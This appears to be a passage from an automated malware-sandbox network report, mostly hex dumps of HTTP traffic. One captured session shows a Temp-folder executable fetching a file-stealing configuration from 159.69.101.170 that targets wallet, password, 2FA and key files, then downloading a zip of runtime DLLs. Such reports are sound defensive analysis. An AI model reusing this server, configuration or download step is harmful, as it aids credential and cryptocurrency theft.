d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 0d d2 29 77 19 39 02 45 7b 83 26 0d 7e 11 65 f9 03 22 ed fe 5b 0a aa 01 95 dc 5a c5 bd e5 af d6 96 b9 7e 20 af 48 cd dd 5d 76 2b 02 3f 72 33 99 bb e8 03 6e 2f d5 12 72 8c 56 f6 ae be bc 2b fb b2 5c 20 40 3a 3a 6d 02 0f 37 07 81 f7 f7 e1 56 4e 53 b6 f3 91 ea 8d 41 5d f1 2b 78 73 60 6a ca 41 3e 79 28 94 33 b9 66 60 66 3e 5c a5 60 15 6b 44 9b cf d2 9f 47 77 e0 19 32 e2 ae 90 b7 86 6e 8b d3 76 4d 6b 9d 9a 4b fc a7 ce ba e7 e8 7a c5 72 2f 0c 3a 09 d7 7b 2b 2d 72 3f ef 96 7b 8b Data Ascii: `@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShG/.9~cbK7"`5\|oz],L{aZ$f/2lBs3Ob>!Z:V?#BSSQW+Y~ExU$$MUa~u~OTzN.%Qa>\|(HkJv/MF$l#l)l~qhJXOyyLhW;r#u1yr+L1<'i3FHU=h"?U@Wd{9f(B@o=fd0QpKk1:TUwo)2[P&}WL\hMgM^gmtyPmCbzDJz(=zg7 R:VcgJ~pvl).5)C'p{:83%=/#wNYRLEsCRW!}B.'<BV`se%x`80_xm^22B9GQ =TZ\Z_i9nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=)w9E{&~e"[Z~ H]v+?r3n/rV+\ @::m7VNSA]+xs`jA>y(3f`f>\`kDGw2nvMkKzr/:{+-r?{
Jun 29, 2022 23:12:21.833096981 CEST	14106	IN	Data Raw: f5 41 21 4d 59 e8 a6 87 5c c6 bc e9 60 6c ef 35 8e 77 d5 83 41 b0 c0 67 43 d6 3d 34 6d 3d 26 de d1 21 de 4f 9d 35 52 27 63 5f 83 56 5a b8 2e 3c f5 80 77 9b 11 dd e5 98 32 68 a2 43 13 e0 38 2d a8 6b 29 e3 1c d8 7a da c0 24 6d ca f6 9f 4c 3e 43 23 Data Ascii: A!MY\`l5wAgC=4m=&!O5R'c_VZ.<w2hC8-k)z$mL>C#`4a0ze$ZQ67*=6'H!\|OZRD6<1wD7QyJ!]_0<Ff3(vIWz4#ZS
Jun 29, 2022 23:12:21.856661081 CEST	14107	IN	Data Raw: df df 2a 8a c3 67 9f ce 5d 9e ba fa 6d 76 ff 2b 07 d7 76 dd f9 57 0f 33 a8 b1 c8 38 a3 b8 c1 25 53 a2 2a 65 2d 01 22 04 4b f1 36 aa b9 21 95 ad 04 29 b6 ff 37 04 c3 65 d5 42 cc 5f b6 16 32 ed 7d ef da 31 e9 0e fa 11 23 95 0e 78 35 b3 56 63 f4 a5 Data Ascii: g]mv+vW38%Se-"K6!)7eB_2}1#x5Vc0h atw-=ARPv.'5KBr+NVg48^+^/Gn~Y_CX47\|F$Sd1`xS5Gr lP<?y!)+
Jun 29, 2022 23:12:21.880598068 CEST	14109	IN	Data Raw: 17 8f 1d 0c 10 0f 9e 51 ac b3 00 e5 66 4e 15 17 ca 37 69 a5 c7 74 e8 55 36 2c c5 16 61 3f d2 b7 3d a5 af 0d 7b 71 23 90 5b 1c 00 3d 4f 65 ba cd d3 c5 e0 68 f1 65 ea 17 53 b0 4f fc b7 2d 78 0c be 3f 87 83 41 b7 b4 9a fd 10 87 0f f6 03 8d ee 05 3d Data Ascii: QfN7itU6,a?={q#[=OeheSO-x?A='^,uSOAZ$\&OM1G0p7Rp+6@2k}GeMg2PkW6`.l5su({\#qSp~]iyN`7
Jun 29, 2022 23:12:22.542609930 CEST	14119	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Jun 2022 21:12:19 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 ca b1 2f c6 d3 2e 39 af 7f 7e c2 63 a3 ed 1e a0 9b 62 be 81 4b d3 f3 a9 ab cb 37 22 85 1d 18 60 9a 10 db 16 a1 35 7c 17 ff 04 ee 6f 06 1f 7a ad 5d 08 93 2c 9b 4c 16 7b 61 ff c5 8e bd 94 f0 10 5a 24 ec f5 99 dc 66 06 2f e9 ee 08 a9 7f 32 83 bf 6c 13 d9 42 08 73 19 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 57 2b 59 b6 b3 1a 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f e8 92 24 f2 4d c5 03 55 b3 a1 61 7e de f5 a9 75 19 17 7e 4f af 9a a5 54 ca a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f5 96 be 25 51 61 9f d4 3e 7c 88 28 c8 48 6b 01 bb 4a 9a 07 fd ec a5 9e 76 ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 d5 58 ce 4f 13 79 82 ae 9c f7 79 4c 0d 68 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 a0 01 f9 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 22 92 ff 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 6f 98 c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 e7 77 b5 1b 6f d3 cb 29 32 d2 e5 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 d3 c1 67 e4 a6 6d 13 9f 10 8d d0 b0 99 f9 9b 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 e5 ac 88 44 a9 b4 bb 4a 7a 17 28 d2 ee 3d 1f d0 a3 aa 7a 8f c4 67 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a 56 63 bf 88 67 4a dc e5 7e 07 a6 70 d4 03 bb d7 98 76 6c 0f ca 82 fb 29 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 83 b2 27 70 10 7b 3a 1d f8 38 94 ae 88 c1 a4 da 33 25 3d da a9 c3 de c4 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 59 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 0d d2 29 77 19 39 02 45 7b 83 26 0d 7e 11 65 f9 03 22 ed fe 5b 0a aa 01 95 dc 5a c5 bd e5 af d6 96 b9 7e 20 af 48 cd dd 5d 76 2b 02 3f 72 33 99 bb e8 03 6e 2f d5 12 72 8c 56 f6 ae be bc 2b fb b2 5c 20 40 3a 3a 6d 02 0f 37 07 81 f7 f7 e1 56 4e 53 b6 f3 91 ea 8d 41 5d f1 2b 78 73 60 6a ca 41 3e 79 28 94 33 b9 66 60 66 3e 5c a5 60 15 6b 44 9b cf d2 9f 47 77 e0 19 32 e2 ae 90 b7 86 6e 8b d3 76 4d 6b 9d 9a 4b fc a7 ce ba e7 e8 7a c5 72 2f 0c 3a 09 d7 7b 2b 2d 72 3f ef 96 7b 8b Data Ascii: `@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShG/.9~cbK7"`5\|oz],L{aZ$f/2lBs3Ob>!Z:V?#BSSQW+Y~ExU$$MUa~u~OTzN.%Qa>\|(HkJv/MF$l#l)l~qhJXOyyLhW;r#u1yr+L1<'i3FHU=h"?U@Wd{9f(B@o=fd0QpKk1:TUwo)2[P&}WL\hMgM^gmtyPmCbzDJz(=zg7 R:VcgJ~pvl).5)C'p{:83%=/#wNYRLEsCRW!}B.'<BV`se%x`80_xm^22B9GQ =TZ\Z_i9nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=)w9E{&~e"[Z~ H]v+?r3n/rV+\ @::m7VNSA]+xs`jA>y(3f`f>\`kDGw2nvMkKzr/:{+-r?{
Jun 29, 2022 23:12:23.430746078 CEST	14234	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Jun 2022 21:12:19 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 ca b1 2f c6 d3 2e 39 af 7f 7e c2 63 a3 ed 1e a0 9b 62 be 81 4b d3 f3 a9 ab cb 37 22 85 1d 18 60 9a 10 db 16 a1 35 7c 17 ff 04 ee 6f 06 1f 7a ad 5d 08 93 2c 9b 4c 16 7b 61 ff c5 8e bd 94 f0 10 5a 24 ec f5 99 dc 66 06 2f e9 ee 08 a9 7f 32 83 bf 6c 13 d9 42 08 73 19 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 57 2b 59 b6 b3 1a 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f e8 92 24 f2 4d c5 03 55 b3 a1 61 7e de f5 a9 75 19 17 7e 4f af 9a a5 54 ca a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f5 96 be 25 51 61 9f d4 3e 7c 88 28 c8 48 6b 01 bb 4a 9a 07 fd ec a5 9e 76 ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 d5 58 ce 4f 13 79 82 ae 9c f7 79 4c 0d 68 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 a0 01 f9 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 22 92 ff 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 6f 98 c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 e7 77 b5 1b 6f d3 cb 29 32 d2 e5 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 d3 c1 67 e4 a6 6d 13 9f 10 8d d0 b0 99 f9 9b 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 e5 ac 88 44 a9 b4 bb 4a 7a 17 28 d2 ee 3d 1f d0 a3 aa 7a 8f c4 67 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a 56 63 bf 88 67 4a dc e5 7e 07 a6 70 d4 03 bb d7 98 76 6c 0f ca 82 fb 29 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 83 b2 27 70 10 7b 3a 1d f8 38 94 ae 88 c1 a4 da 33 25 3d da a9 c3 de c4 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 59 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 0d d2 29 77 19 39 02 45 7b 83 26 0d 7e 11 65 f9 03 22 ed fe 5b 0a aa 01 95 dc 5a c5 bd e5 af d6 96 b9 7e 20 af 48 cd dd 5d 76 2b 02 3f 72 33 99 bb e8 03 6e 2f d5 12 72 8c 56 f6 ae be bc 2b fb b2 5c 20 40 3a 3a 6d 02 0f 37 07 81 f7 f7 e1 56 4e 53 b6 f3 91 ea 8d 41 5d f1 2b 78 73 60 6a ca 41 3e 79 28 94 33 b9 66 60 66 3e 5c a5 60 15 6b 44 9b cf d2 9f 47 77 e0 19 32 e2 ae 90 b7 86 6e 8b d3 76 4d 6b 9d 9a 4b fc a7 ce ba e7 e8 7a c5 72 2f 0c 3a 09 d7 7b 2b 2d 72 3f ef 96 7b 8b Data Ascii: `@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShG/.9~cbK7"`5\|oz],L{aZ$f/2lBs3Ob>!Z:V?#BSSQW+Y~ExU$$MUa~u~OTzN.%Qa>\|(HkJv/MF$l#l)l~qhJXOyyLhW;r#u1yr+L1<'i3FHU=h"?U@Wd{9f(B@o=fd0QpKk1:TUwo)2[P&}WL\hMgM^gmtyPmCbzDJz(=zg7 R:VcgJ~pvl).5)C'p{:83%=/#wNYRLEsCRW!}B.'<BV`se%x`80_xm^22B9GQ =TZ\Z_i9nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=)w9E{&~e"[Z~ H]v+?r3n/rV+\ @::m7VNSA]+xs`jA>y(3f`f>\`kDGw2nvMkKzr/:{+-r?{
Jun 29, 2022 23:12:23.601048946 CEST	14237	IN	Data Raw: 7b e9 2f 6a 1a 4e ef 42 fd d4 2a 69 47 ae 44 7f 5b a7 9e 54 0f 0f b3 97 cb 99 40 c6 6a 4f b0 1d 0d 65 1f 57 0f 45 db 8e 31 43 db 7b 68 97 ca 3c d5 59 c2 66 3e c4 b6 0f 37 86 25 e8 34 2c 83 84 15 09 07 be ea 5d e4 dd 96 08 06 af 37 38 31 56 09 e4 Data Ascii: {/jNB*iGD[T@jOeWE1C{h<Yf>7%4,]781Vb_%gQE:6rXpcx0uY^VeEDcjhJ>Y649QXu]MVSdkjOFA>C%H;Y
Jun 29, 2022 23:12:23.624932051 CEST	14239	IN	Data Raw: f4 88 c3 b8 57 79 d0 e5 7d 3a 30 c4 d8 39 77 c4 20 aa 48 65 2e 54 75 f4 e8 6a 4c 83 21 da 6c 5d 8a 8e 4e 90 e3 59 50 02 6f e0 e1 a2 b7 73 4f 7f 58 10 ca 20 e8 4c 05 40 e5 09 70 df 8a 81 fa 90 a9 71 72 35 95 5e 6c 2c fd 94 1a 96 83 11 06 0b 03 81 Data Ascii: Wy}:09w He.TujL!l]NYPosOX L@pqr5^l,Iu_jV/?GvS"@MvnI'x-%'HF4zG<^<1vJXkxul~D_q$ETN;dfo7Ow5AU+I[oo9?"}?d
Jun 29, 2022 23:12:23.702385902 CEST	14241	IN	Data Raw: df df 2a 8a c3 67 9f ce 5d 9e ba fa 6d 76 ff 2b 07 d7 76 dd f9 57 0f 33 a8 b1 c8 38 a3 b8 c1 25 53 a2 2a 65 2d 01 22 04 4b f1 36 aa b9 21 95 ad 04 29 b6 ff 37 04 c3 65 d5 42 cc 5f b6 16 32 ed 7d ef da 31 e9 0e fa 11 23 95 0e 78 35 b3 56 63 f4 a5 Data Ascii: g]mv+vW38%Se-"K6!)7eB_2}1#x5Vc0h atw-=ARPv.'5KBr+NVg48^+^/Gn~Y_CX47\|F$Sd1`xS5Gr lP<?y!)+
Jun 29, 2022 23:12:23.728791952 CEST	14243	IN	Data Raw: 17 8f 1d 0c 10 0f 9e 51 ac b3 00 e5 66 4e 15 17 ca 37 69 a5 c7 74 e8 55 36 2c c5 16 61 3f d2 b7 3d a5 af 0d 7b 71 23 90 5b 1c 00 3d 4f 65 ba cd d3 c5 e0 68 f1 65 ea 17 53 b0 4f fc b7 2d 78 0c be 3f 87 83 41 b7 b4 9a fd 10 87 0f f6 03 8d ee 05 3d Data Ascii: QfN7itU6,a?={q#[=OeheSO-x?A='^,uSOAZ$\&OM1G0p7Rp+6@2k}GeMg2PkW6`.l5su({\#qSp~]iyN`7
Jun 29, 2022 23:12:23.752727032 CEST	14245	IN	Data Raw: 7b e9 2f 6a 1a 4e ef 42 fd d4 2a 69 47 ae 44 7f 5b a7 9e 54 0f 0f b3 97 cb 99 40 c6 6a 4f b0 1d 0d 65 1f 57 0f 45 db 8e 31 43 db 7b 68 97 ca 3c d5 59 c2 66 3e c4 b6 0f 37 86 25 e8 34 2c 83 84 15 09 07 be ea 5d e4 dd 96 08 06 af 37 38 31 56 09 e4 Data Ascii: {/jNB*iGD[T@jOeWE1C{h<Yf>7%4,]781Vb_%gQE:6rXpcx0uY^VeEDcjhJ>Y649QXu]MVSdkjOFA>C%H;Y
Jun 29, 2022 23:12:23.784239054 CEST	14250	IN	Data Raw: f4 88 c3 b8 57 79 d0 e5 7d 3a 30 c4 d8 39 77 c4 20 aa 48 65 2e 54 75 f4 e8 6a 4c 83 21 da 6c 5d 8a 8e 4e 90 e3 59 50 02 6f e0 e1 a2 b7 73 4f 7f 58 10 ca 20 e8 4c 05 40 e5 09 70 df 8a 81 fa 90 a9 71 72 35 95 5e 6c 2c fd 94 1a 96 83 11 06 0b 03 81 Data Ascii: Wy}:09w He.TujL!l]NYPosOX L@pqr5^l,Iu_jV/?GvS"@MvnI'x-%'HF4zG<^<1vJXkxul~D_q$ETN;dfo7Ow5AU+I[oo9?"}?d
Jun 29, 2022 23:12:23.804748058 CEST	14253	IN	Data Raw: 18 77 3b 2c 4f e2 57 90 1b 80 a6 95 3b 9b 3b bd 4b fc 23 e3 e6 d1 f2 07 cf 96 77 28 85 43 68 9e 10 98 85 5a 38 db 69 93 93 ff 3d 05 08 48 71 80 3c dd 66 93 09 48 1f 20 99 85 df 8d cb ee 04 43 59 b4 06 f0 8b cd 51 ba 11 58 eb d8 36 bf c3 10 68 c5 Data Ascii: w;,OW;;K#w(ChZ8i=Hq<fH CYQX6h/9\yF!OCL2ArAlk^7yt/41-;nu&co#f>;>hy-?IH?5ORd,!^j$oJ3ge

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49792	159.69.101.170	80	C:\Users\user\AppData\Local\Temp\7791.exe

Timestamp	kBytes transferred	Direction	Data
Jun 29, 2022 23:12:20.205418110 CEST	12298	OUT	GET /1415 HTTP/1.1 Host: 159.69.101.170
Jun 29, 2022 23:12:20.334595919 CEST	12299	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 29 Jun 2022 21:12:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 62 61 0d 0a 31 2c 31 2c 31 2c 31 2c 31 2c 31 2c 31 2c 31 2c 31 2c 31 2c 32 35 30 2c 44 65 66 61 75 6c 74 3b 25 44 45 53 4b 54 4f 50 25 5c 3b 2a 2e 74 78 74 3a 2a 2e 64 61 74 3a 2a 77 61 6c 6c 65 74 2a 2e 2a 3a 2a 32 66 61 2a 2e 2a 3a 2a 62 61 63 6b 75 70 2a 2e 2a 3a 2a 63 6f 64 65 2a 2e 2a 3a 2a 70 61 73 73 77 6f 72 64 2a 2e 2a 3a 2a 61 75 74 68 2a 2e 2a 3a 2a 67 6f 6f 67 6c 65 2a 2e 2a 3a 2a 75 74 63 2a 2e 2a 3a 2a 55 54 43 2a 2e 2a 3a 2a 63 72 79 70 74 2a 2e 2a 3a 2a 6b 65 79 2a 2e 2a 3b 35 30 3b 74 72 75 65 3b 6d 6f 76 69 65 73 3a 6d 75 73 69 63 3a 6d 70 33 3b 0d 0a 30 0d 0a 0d 0a Data Ascii: ba1,1,1,1,1,1,1,1,1,1,250,Default;%DESKTOP%\;.txt:.dat:wallet.:2fa.:backup.:code.:password.:auth.:google.:utc.:UTC.:crypt.:key.*;50;true;movies:music:mp3;0
Jun 29, 2022 23:12:20.345841885 CEST	12299	OUT	GET /4798399205.zip HTTP/1.1 Host: 159.69.101.170 Cache-Control: no-cache
Jun 29, 2022 23:12:20.368314981 CEST	12301	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 29 Jun 2022 21:12:20 GMT Content-Type: application/zip Content-Length: 1565849 Last-Modified: Wed, 13 Apr 2022 15:59:31 GMT Connection: keep-alive ETag: "6256f363-17e499" Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 10 6e 55 53 4b 12 b5 9b e9 b5 00 00 48 47 01 00 10 00 00 00 76 63 72 75 6e 74 69 6d 65 31 34 30 2e 64 6c 6c ec fd 0b 40 54 d5 d7 30 0e 9f 61 06 18 71 60 46 05 45 45 1d 15 6f e1 65 98 e1 3e c3 55 06 f1 82 0e 22 e0 0d 11 b9 38 10 02 c1 39 a8 29 8a 0e 94 e3 69 ca 5f 59 59 59 69 5a 3f 2b 2b bb 99 99 19 88 09 98 29 5e 2a 4b 2b 34 ab 83 43 8a 46 80 4a ce b7 d6 3e 67 60 50 e9 79 9e f7 ff 3e ff f7 7b bf ef 41 f7 39 fb ba f6 da 6b af b5 f6 da fb ec bd 27 61 e1 16 4a 4c 51 94 04 9c cd 46 51 07 28 fe 2f 8a fa 8f ff 5a c0 79 8c 38 e8 41 7d d4 e7 eb 91 07 44 b3 be 1e 39 cf 98 5b a2 2c 2a 2e 5c 5e 9c b1 42 99 99 51 50 50 48 2b 97 65 2b 8b 99 02 65 6e 81 32 76 4e 92 72 45 61 56 f6 64 77 77 37 5f 01 86 e8 d6 ae d9 fa 6d 5f 0f b3 bb 1b 92 51 c3 a6 c1 7b 56 e3 92 61 b3 49 dc 89 61 f9 f0 de 7e bb de 27 99 bc 4f fa a4 90 77 9d 4f 34 79 7f e9 93 4e de 5f fb c4 92 b7 7a 18 ff 3e 45 c2 73 73 33 8d 08 d7 8e b3 41 4f 51 b3 44 ce 94 2c 64 dc 02 7b 5c 23 35 6a 64 5f 91 47 5f ea 2a 04 94 42 e4 bb e0 14 04 43 8a f8 d0 ef 44 51 2e f0 72 a3 f8 37 f9 8b 12 11 e2 1d ea e7 04 74 8c 8a 26 85 14 14 d5 fd e6 5f fb 80 58 9e 7d 28 aa 4a 21 a2 9e c0 48 a5 88 92 4a 1c 88 29 15 51 f1 91 f0 56 89 a8 ad 50 c1 be 11 14 15 42 f5 fe c7 8d b8 a7 8f 00 ee a1 7f c8 3f 99 ce 5e 45 c3 fb 68 93 80 d0 55 a1 d3 1d fe a0 e9 4b 27 67 65 d0 19 e0 8f 25 0d 14 91 36 53 d7 1c 73 91 7a ab 26 e7 f2 19 0f 38 f3 75 13 82 b4 dc 97 2f 6a 72 71 49 71 26 36 4f 82 15 08 f9 da 1e 94 2f 3b bf 30 93 22 6d 47 1a 50 32 78 77 de 97 2f 86 fa 9f bf ff ad 7f 45 63 e1 d1 00 0f 51 0b fa b6 8c 43 3a 8f c7 b8 87 30 d9 0f 45 06 1f 5b f0 b1 03 1f fb f0 51 85 8f 06 7c 28 27 62 87 e1 23 0a 1f 8d f8 50 4c c2 54 7c 50 93 31 88 8f a5 f8 68 51 63 89 00 8a e2 99 5b 15 8a f0 c2 30 a8 43 1f 3e a8 70 2c 11 81 25 f0 51 85 8f 46 7c 50 28 1d e5 f8 58 8a 8c 5f 14 8b 09 f8 a0 f4 58 39 3e 8a 88 2f 0e 71 c6 c7 52 7c 6c c1 07 35 0d eb c5 47 14 3e 96 e2 43 35 1d e1 cd 44 4c f1 d1 82 0f 6a 16 e6 c3 47 14 3e ca 49 30 01 d1 c0 47 d1 9b 18 87 8f 2d f8 d8 87 8f 2a e2 7b 0b f3 bd 8d 40 f1 11 85 8f a5 f8 28 22 c1 bd 58 02 1f 0d 7b ed 9a 65 3c 3c 44 1d f8 90 ec 83 87 6a 1f 82 c2 87 f4 7d 2c fb 01 12 1b 1f ca 0f 11 28 3e 12 f1 f1 1c 3e a8 8f a1 44 d1 7e 24 d3 67 48 83 06 04 7f 1a 83 df a1 ef 22 36 e6 47 2c fb 33 82 6a 44 0c 7e 45 5c f0 b1 f4 37 28 bb 03 1f 0d bf 61 02 87 a0 50 15 18 ac 58 a5 b5 07 6f d8 b5 5f b9 92 52 40 26 85 ca 49 a4 28 07 47 f1 9d ad d8 e3 49 29 ae 80 53 7a 51 0a c5 50 4a e1 0b 2e 0a dc 3c 70 34 b8 bd 10 7f 00 5c 15 b8 13 e0 ce 83 bb 02 ae 05 1c 35 90 52 c8 c0 79 82 f3 01 37 1e 5c 00 b8 88 81 